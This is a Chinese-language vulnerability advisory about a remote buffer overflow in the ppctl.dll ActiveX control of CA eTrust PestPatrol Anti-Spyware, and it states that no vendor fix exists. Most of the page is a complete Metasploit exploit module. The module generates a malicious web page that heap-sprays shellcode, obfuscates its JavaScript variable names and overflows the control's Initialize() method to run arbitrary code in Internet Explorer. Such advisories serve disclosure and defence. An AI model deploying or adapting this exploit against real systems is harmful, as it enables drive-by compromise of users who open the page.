CA eTrust PestPatrol Anti-Spyware ‘ppctl.dl’ ActiveX控件远程缓冲区溢出漏洞

漏洞起因
边界条件错误
 
影响系统
Computer Associates eTrust PestPatrol Anti-spyware
 
不受影响系统
 
危害
远程攻击者可以利用漏洞以应用程序权限执行任意代码。
 
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户解析。
 
漏洞信息
CA eTrust PestPatrol Anti-Spyware是一款企业电脑预防保护软件, 可以防止特洛伊木马,黑客工具,键盘监视,间谍软件等工具对企业网络进行破坏和攻击。
CA eTrust PestPatrol包含的"ppctl.dll" ActiveX控件不正确使用"Initialize"方式,构建恶意WEB页,诱使用户解析,可允许远程攻击者在系统上执行任意代码。
 
测试方法
###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
##
http://metasploit.com/projects/Framework/
###
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
 include Msf::Exploit::FILEFORMAT
 def initialize(info = {})
  super(update_info(info,
   ‘Name’           => ‘CA eTrust PestPatrol ActiveX Control Buffer Overflow’,
   ‘Description’    => %q{
    This module exploits a stack overflow in CA eTrust PestPatrol. When
    sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)
    an attacker may be able to execute arbitrary code.
   },
   ‘License’        => MSF_LICENSE,
   ‘Author’         => [ ‘MC’ ],
   ‘Version’        => ‘$Revision:$’,
   ‘References’     =>
    [
     [ ‘URL’, ‘http://www.metasploit.com’ ],
     [ ‘URL’, ‘http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm’ ],
    ],
   ‘DefaultOptions’ =>
    {
     ‘EXITFUNC’ => ‘process’,
    },
   ‘Payload’        =>
    {
     ‘Space’         => 1024,
     ‘BadChars’      => "\x00",
    },
   ‘Platform’       => ‘win’,
   ‘Targets’        =>
    [
     [ ‘Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7’, { ‘Ret’ => 0x0A0A0A0A } ] 
    ],
   ‘DisclosureDate’ => ‘Jun 5 2007’,
   ‘DefaultTarget’  => 0))
   register_options(
    [
     OptString.new(‘FILENAME’, [ false, ‘The file name.’,  ‘msf.html’]),
    ], self.class)
 end
 def exploit
  # Encode the shellcode.
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
  
  # Create some nops. 
  nops    = Rex::Text.to_unescape(make_nops(4))
 
  # Set the return.
  ret     = Rex::Text.uri_encode([target.ret].pack(‘L’))
  # Randomize the javascript variable names.
  vname  = rand_text_alpha(rand(100) + 1)
  var_i  = rand_text_alpha(rand(30)  + 2)
  rand1  = rand_text_alpha(rand(100) + 1)
  rand2  = rand_text_alpha(rand(100) + 1)
  rand3  = rand_text_alpha(rand(100) + 1)
  rand4  = rand_text_alpha(rand(100) + 1)
  rand5  = rand_text_alpha(rand(100) + 1)
  rand6  = rand_text_alpha(rand(100) + 1)
  rand7  = rand_text_alpha(rand(100) + 1)
  rand8  = rand_text_alpha(rand(100) + 1)
  content = %Q|
         <html>
            <object id=’#{vname}’ classid=’clsid:5E644C49-F8B0-4E9A-A2ED-5F176BB18CE6′></object>
            <script language="JavaScript">
            var #{rand1} = unescape(‘#{shellcode}’);
            var #{rand2} = unescape(‘#{nops}’);
            var #{rand3} = 20;
            var #{rand4} = #{rand3} + #{rand1}.length;
            while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
            var #{rand5} = #{rand2}.substring(0,#{rand4});
            var #{rand6} = #{rand2}.substring(0,#{rand2}.length – #{rand4});
            while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
            var #{rand7} = new Array();
            for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
            var #{rand8} = "";
            for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescape(‘#{ret}’) }
            #{vname}.Initialize(#{rand8});
            </script>
         </html>
    |
  content = Rex::Text.randomize_space(content)
  print_status("Creating ‘#{datastore[‘FILENAME’]}’ file …")
  file_create(content)
 end
end
 
厂商解决方案
目前没有详细解决方案提供:
http://www.my-etrust.com
 
漏洞提供者
Fortinet

发表评论?

0 条评论。

发表评论